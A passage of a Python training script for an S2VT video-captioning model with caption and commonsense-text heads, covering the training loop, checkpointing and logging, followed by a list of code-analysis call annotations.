cal_performance(cms_probs.view(-1, cms_probs.shape[-1]), cms_labels[:, 1:], smoothing=True) # compute the token prediction Acc. non_pad_mask = cap_labels[:, 1:].ne(Constants.PAD) n_word = non_pad_mask.sum().item() cms_non_pad_mask = cms_labels[:, 1:].ne(Constants.PAD) cms_n_word = cms_non_pad_mask.sum().item() cap_loss /= n_word cms_loss /= n_word loss = cms_loss + cap_loss loss.backward() optimizer.step_and_update_lr() torch.nn.utils.clip_grad_norm_(filter(lambda p: p.requires_grad, model.parameters()), 1) # update parameters cap_train_loss = cap_loss.item() cms_train_loss = cms_loss.item() # multi-gpu case, not necessary in newer PyTorch version or on single GPU. if opt['cuda']: torch.cuda.synchronize() iteration += 1 if iteration % opt['print_loss_every'] ==0: print('iter %d (epoch %d), cap_train_loss = %.6f, cms_train_loss = %.6f,' ' current step = %d, current lr = %.3E, cap_acc = %.3f, cms_acc = %.3f' % (iteration, epoch, cap_train_loss, cms_train_loss, optimizer.n_current_steps, optimizer._optimizer.param_groups[0]['lr'], cap_n_correct/n_word, cms_n_correct/cms_n_word)) # show the intermediate generations if opt['show_predict']: cap_pr, cap_gt = show_prediction(cap_probs, cap_labels[:, :-1], cap_vocab, caption=True) cms_pr, cms_gt = show_prediction(cms_probs, cms_labels[:, :-1], cms_vocab, caption=False) print(' \n') with open(opt['info_path'], 'a') as f: f.write('model_%d, cap_loss: %.6f, cms_loss: %.6f\n' % (epoch, cap_train_loss, cms_train_loss)) f.write('\n %s \n %s' % (cap_pr, cap_gt)) f.write('\n %s \n %s' % (cms_pr, cms_gt)) f.write('\n') if epoch % opt['save_checkpoint_every'] == 0: # save the checkpoint model_path = os.path.join(opt['output_dir'], 'CMS_CAP_MODEL_{}_lr_{}_BS_{}_Layer_{}_ATTHEAD_{}_HID_{}_RNNLayer_{}_epoch_{}.pth' .format(opt['cms'], opt['init_lr'], opt['batch_size'], opt['num_layer'], opt['num_head'], opt['dim_model'], opt['rnn_layer'], epoch)) torch.save(model.state_dict(), model_path) print('model saved to %s' % model_path) with open(opt['model_info_path'], 'a') as f: f.write('model_%d, cap_loss: %.6f, cms_loss: %.6f\n' % (epoch, cap_train_loss/n_word, cms_train_loss/n_word)) def main(opt): # load and define dataloader dataset = VideoDataset(opt, 'train') dataloader = DataLoader(dataset, batch_size=opt['batch_size'], shuffle=True) opt['cms_vocab_size'] = dataset.get_cms_vocab_size() opt['cap_vocab_size'] = dataset.get_cap_vocab_size() if opt['cms'] == 'int': cms_text_length = opt['int_max_len'] elif opt['cms'] == 'eff': cms_text_length = opt['eff_max_len'] else: cms_text_length = opt['att_max_len'] # model initialization. from model.S2VTModel import S2VTModel model = S2VTModel( dataset.get_cap_vocab_size(), dataset.get_cms_vocab_size(), opt['cap_max_len'], cms_text_length, opt["dim_model"], opt["dim_word"], opt['dim_vis_feat'], n_layers=opt['rnn_layer']) # number of parameters model_parameters = filter(lambda p: p.requires_grad, model.parameters()) params = sum([np.prod(p.size()) for p in model_parameters]) print('number of learnable parameters are {}'.format(params)) if opt['cuda']: model = model.cuda() # resume from previous checkpoint if indicated if opt['load_checkpoint'] and opt['resume']: cap_state_dict = torch.load(opt['load_checkpoint']) model_dict = model.state_dict() model_dict.update(cap_state_dict) model.load_state_dict(model_dict) optimizer = ScheduledOptim(optim.Adam(filter(lambda x: x.requires_grad, model.parameters()), betas=(0.9, 0.98), eps=1e-09), 512, opt['warm_up_steps']) # note: though we set the init learning rate as np.power(d_model, -0.5), # grid search indicates different LR may improve the results. opt['init_lr'] = round(optimizer.init_lr, 3) # create checkpoint output directory dir = os.path.join(opt['checkpoint_path'], 'S2VT_CMS_CAP_MODEL_{}_lr_{}_BS_{}_Layer_{}_ATTHEAD_{}_HID_{}_RNNLayer_{}' .format(opt['cms'], opt['init_lr'], opt['batch_size'], opt['num_layer'], opt['num_head'], opt['dim_model'], opt['rnn_layer'])) if not os.path.exists(dir): os.makedirs(dir) # save the model snapshot to local info_path = os.path.join(dir, 'iteration_info_log.log') print('model architecture saved to {} \n {}'.format(info_path, str(model))) with open(info_path, 'a') as f: f.write(str(model)) f.write('\n') f.write(str(params)) f.write('\n') # log file directory opt['output_dir'] = dir opt['info_path'] = info_path opt['model_info_path'] = os.path.join(opt['output_dir'], 'checkpoint_loss_log.log') train(dataloader, model, optimizer, opt, dataset.get_cap_vocab(), dataset.get_cms_vocab()) if __name__ == '__main__': opt = parse_opt() opt = vars(opt) main(opt)
[((113, 14, 113, 40), 'utils.dataloader.VideoDataset', 'VideoDataset', ({(113, 27, 113, 30): 'opt', (113, 32, 113, 39): '"""train"""'}, {}), "(opt, 'train')", False, 'from utils.dataloader import VideoDataset\n'), ((114, 17, 114, 80), 'torch.utils.data.DataLoader', 'DataLoader', (), '', False, 'from torch.utils.data import DataLoader\n'), ((167, 16, 167, 59), 'os.path.join', 'os.path.join', ({(167, 29, 167, 32): 'dir', (167, 34, 167, 58): '"""iteration_info_log.log"""'}, {}), "(dir, 'iteration_info_log.log')", False, 'import os\n'), ((178, 29, 178, 87), 'os.path.join', 'os.path.join', ({(178, 42, 178, 59): "opt['output_dir']", (178, 61, 178, 86): '"""checkpoint_loss_log.log"""'}, {}), "(opt['output_dir'], 'checkpoint_loss_log.log')", False, 'import os\n'), ((164, 11, 164, 30), 'os.path.exists', 'os.path.exists', ({(164, 26, 164, 29): 'dir'}, {}), '(dir)', False, 'import os\n'), ((164, 32, 164, 48), 'os.makedirs', 'os.makedirs', ({(164, 44, 164, 47): 'dir'}, {}), '(dir)', False, 'import os\n')]